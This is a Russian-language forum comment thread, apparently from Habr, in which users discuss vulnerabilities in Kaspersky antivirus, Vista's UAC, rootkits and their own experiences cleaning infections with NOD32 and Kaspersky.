                                                                        Хм. Насколько я вижу, последняя весрия, поставляемая на сайте - все та же 7.0.0.125. Более того - самое интересно что последних фикс, который был сделан, связан как раз с материалом, обсуждаемым в статье http://www.kaspersky.ru/technews?id=2031…
                                                                          0
                                                                          Значит надо опять пинать кого следует, завтра пну. Проверять, а то это будет не технический разговор а перепинываение грязи.
                                                                        • НЛО прилетело и опубликовало эту надпись здесь
                                                                            0
                                                                            Вот. Наконец-то комментарий по делу.
                                                                            А с другой стороны. Все протестить не возможно.
                                                                      0
                                                                      Жаль человека, который потратил на статью свое время...
                                                                      Касперский все прекрасно знает, но многие вещи не в его интересах.
                                                                      Да и система настолько дырява, что позволяет все, а антивирус, чтобы следить за всеми возможными и невозможными брешами должен стабильно занимать все процессорное время и память.
                                                                        0
                                                                        Дырявость системы обсуждать - это разводить новый холивар. С другой стороны появились верные шаги в висте - запрашивать у пользователя разрешение на действие. Однако немного из поюзав - пришлось отключить - некоторые программы некорректно работали - система запрещала им доступ не спрашивая у меня.
                                                                        А ведь такая логичная для каждого линуксодиа вещь, как работать не из под рута уже могла бы спасти отца русской демократии от половины проблем.
                                                                          0
                                                                          Виндовс - система для дурака, т.к. там есть протекция файлов, скрытие и т.п. вещи, чтобы она не ругалась на компе уездного бухгалтера, проще, естественно, запускать ее под админом, а то придется еще полдня объяснять что такое "запустить от имени...".

                                                                          Я думаю на этом мы закончим холивар.
                                                                          А у линуксоида есть голова, и он боится сделать что-то не так, это раз, два - чтобы ему кто-то что-то сделал.

                                                                          Логичные вещи висты могут не обсуждаться, когда можно обустроить троян в ring0, или написать собственный драйвер, который будет работать на уровне, ниже системного, что его даже касперский не найдет.
                                                                            0
                                                                            На самом деле UAC совершенно не мешает жить. Точнее, мешает первые несколько дней, когда идёт установка новых приложений и настройка системы "под себя". При обычно работе UAC вылезает пару-тройку раз в неделю, не чаще...

                                                                            Рекомендую включить его обратно - он действительно практически сводит на нет вероятность возникновения всяких неприятностей с безопасностью. Чтобы программы, требующие админских привилегий, работали корректно, надо произвести следующие несложные действия:

                                                                            1) Создаёте ярлык для программы.
                                                                            2) Открываете свойства ярлыка. На закладке "Ярлык" (она открыта по умолчанию) нажимаете кнопку "Дополнительно..."
                                                                            3) В открывшемся окне ставите галочку "Запуск от имени администратора".

                                                                            Всё! UAC на месте, "капризные" программы тоже работают безупречно :)
                                                                              0
                                                                              Спасибо за совет товарищ :) Но UAC я и так собирался включить назад, да и к тому же, чтобы запустить программу из под админа достаточно из контекстного меню выбрать именно этот пункт :) (Run as Administrator)
                                                                          0
                                                                          У Касперского Антируткит - только для видимости, типа модно, и "чтобы было". Его всерьез и не воспринимают. А интересно, у полноценных антируткитов (Safe n sec, Panda Antirutkit...) - такая же история, кто нибудь тестил?
                                                                            0
                                                                            приносили мне safe'n'sec - я долго смеялся)
                                                                            в легкую отключил антируткит с помощью старой фичи
                                                                            0
                                                                            А про AVAST что можете сказать?
                                                                              0
                                                                              Я не спец в антивирусах
                                                                              –1
                                                                              Я не знаю какой из антивирусов лучше или хуже. Я не верю в обзоры, статьи.
                                                                              У меня на компе был вирус, поставленный НОД32 постоянно сообщал что есть вирус, неправильно определял подтип этого вируса (С вместо Д или как то так.), базы были старые, но более поздние чем выхода вируса.
                                                                              Очень нелогично себя вел - поскольку вся система была заражена (exe файлы), он раз 100 показал окно мол фаил-такой то заражен. И только после этого он успокоился и дал просканирать систему. После этого, оказалось что надо сканер было запускать по другому, чтобы он еще что то делал с этими файлами.
                                                                              Чудесный вирус заражал еще все php, html файлы, просто тупо ставил iframe в код.
                                                                              НОД32 НЕ МОГ ВЫЛЕЧИТЬ эти файлы и предлагал их удалить!!! Про exe я вообще молчу, поубивал весь софт.

                                                                              Намучался я с ним вообщем, решил - была не была, поставлю Каспера. Каспер все вылечил (слава богу), что не смог вылечить - поместил в карантин. К Касперу относился предвзято - раньше он очень много ресурсов потреблял, но поставил седьмую версию был приятно удивлен.
                                                                                0
                                                                                Сталкивался с похожей проблемой не разЮ поэтому использую KAV. И с тех пор ситуация не изменилась.
                                                                                NOD работает быстро, обнаруживает вроде неплохо (некоторые считают, что лучше всех), но лечить практически не умеет. KAV же с этим справляется в большинстве случаев.
                                                                                0
                                                                                Каспер является одним из самых распространенных антивирусников, следственно, и самым иследуюмым в области уязвимостей...
                                                                                Интересная тема переросла в еще один "холивар"
                                                                                  0
                                                                                  +1! Всегда самый дырявый продукт - это самый популярный. Как только "Самый безопасный" становиться популярным, так сразу находится куча брешей )))

                                                                                  Я не про Касперского, я в принципе.
                                                                                  0
                                                                                  Интересно, а как в Висте проактивка касперского работает, там же SSDT патчить нельзя и вообще ядро модифицировать.
                                                                                    –1
                                                                                    по собственному опыту скажу, что в сВисте плохо работает. Пропустил полгода назад троян, который был на сайте Gizmo Call. Троян маскировался под плагин к браузеру для дзвонков.
                                                                                      0
                                                                                      Пропустил в каком смысле, не определил что троян? или несработала проактивная защита??? Меня именно проактивка интересует, т.к. в той реализации в которой она существует в w2k\XP она просто не может работать в Висте... если конечно не было хака системы
                                                                                        0
                                                                                        В СП1 к Висте Микрософт переделывает АПИ и будет возможна.
                                                                                          0
                                                                                          Ну API это же не доступ к ядру. Реестр можно и в XP хукать через ядерные API (Registry Callback), не прибегая к патчу SSDT, но это все равно не полная власть над системой
                                                                                        0
                                                                                        Какой троян??? Это у гизмо фича такая есть - дозвон прямо из браузера, номер подставляется в ссылку. В некоторых случаях удобно. К тому же там все было подробно и понятно описано.
                                                                                      0
                                                                                      Я думаю разработчики ответят сами. Как раз в преддверии выхода пакета обновлений версии 7.0.1.ххх.

                                                                                      Читать здесь: http://forum.kaspersky.com/index.php?sho…
                                                                                        +3
                                                                                        Прекрасная статья!
                                                                                        По-моему на хабре должны быть именно такие.
                                                                                          0
                                                                                          Касперский-Касперский, не знаю, насчет использования мнения очень различны...
                                                                                          Я вот тоже его (KIS) cтавил для тестирования, но как только запретил KIS-у запускать самого себя, был в шоке от того, что Kaspersky Internet Security сам себя запретил :) и это при том, что я не устанавливал пароль на модификацию настроек (собсно, а много ли пиплов такие пароли ставит на своей рабочей станции?)...
                                                                                            +1
                                                                                            Лучшая статья за многое время на хабре. Качественный материал. Спасибо вам.
                                                                                              +1
                                                                                              молодцы ребята, было интересно читать.
                                                                                                +1
                                                                                                Не поленился, прочитал и http://www.viruslist.ru/analysis?pubid=204007553 , где якобы "исследователи", прикрывающиеся белыми шляпами" несут сплошное зло.
                                                                                                Но согласитесь, всю жизнь отладка таких программ шла по двум направлениям: первое - сам разработчик, что то там увидел и латает, второе - ему подсказывают путём нахожденья разных дыр. Из практики второе направление эффективно на порядок.
                                                                                                И нечего Касперскому оправдываться, мол "производителям средств защиты остается только бросить долю ресурсов на восстановление своего авторитета" (залатывая дыры) - и правильно, стиснув зубы, дружно исправляем баги.
                                                                                                  0
                                                                                                  Снес каспера после того как на моей машине перестал работать debug в visual studio.
                                                                                                    0
                                                                                                    Материал прекрасен, спасибо

                                                                                                    Сам антивирусом не пользуюсь. Изредка качаю какой-нибудь бесплатный дохутрвеб сканер, пробегаю систему — чисто.

                                                                                                    А всё потому, что не качаю что попало и откуда попало. И с флэшками осторожен. И дома я за никсовым NATом.

                                                                                                    А вообще, Каспер всегда не любил по многим причинам. И его параноидальность, благодаря которой он ищет вирусы в гифах, мп3шках итд. Как он пытается распаковать архив с двухгиговым образом диска, после чего все гигабайты оперы и свапа куда-то исчезали. И надоедливые сообщения о том, как давно я не проверял систему.

                                                                                                    Ну и конечно же то, как он грузит систему. Все эти хуки на всё мыслимое и немыслимое бьют по производительности с ноги.

                                                                                                    Однако, если рассматривать антивирус как продукт для обычного юзера, котрый хочет спокойно лазить по интернетам, то всё, что я написал выше не важно. Приоритетна уже защита. И вот статья нам показывает, что жертв-то много, а толку мало.

                                                                                                    А неостановимость каспера убивает. Вот начнёт он вешать систему, и не убьёшь сам. В безопасный нада грузится, чтобы удалить его.

                                                                                                    Ёмоё, антивирусы уже сами превращаются в вирусы, используя всё больше технологий оных. Сами уже как руткиты, защищаются от вирей, а заодно и от юзера. А система от них почище чем от самих вирусов порой страдает.
                                                                                                      0
                                                                                                      Не знаю как кто к Касперскому относится, но я ради любопытства поставил Касперский Интернет Секьюрити, настроил без запроса паролей и ... Запретил KISу запускать самого себя, и он ЗАПРЕТИЛ :) С тех пор....

                                                                                                      Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

                                                                                                      Самое читаемое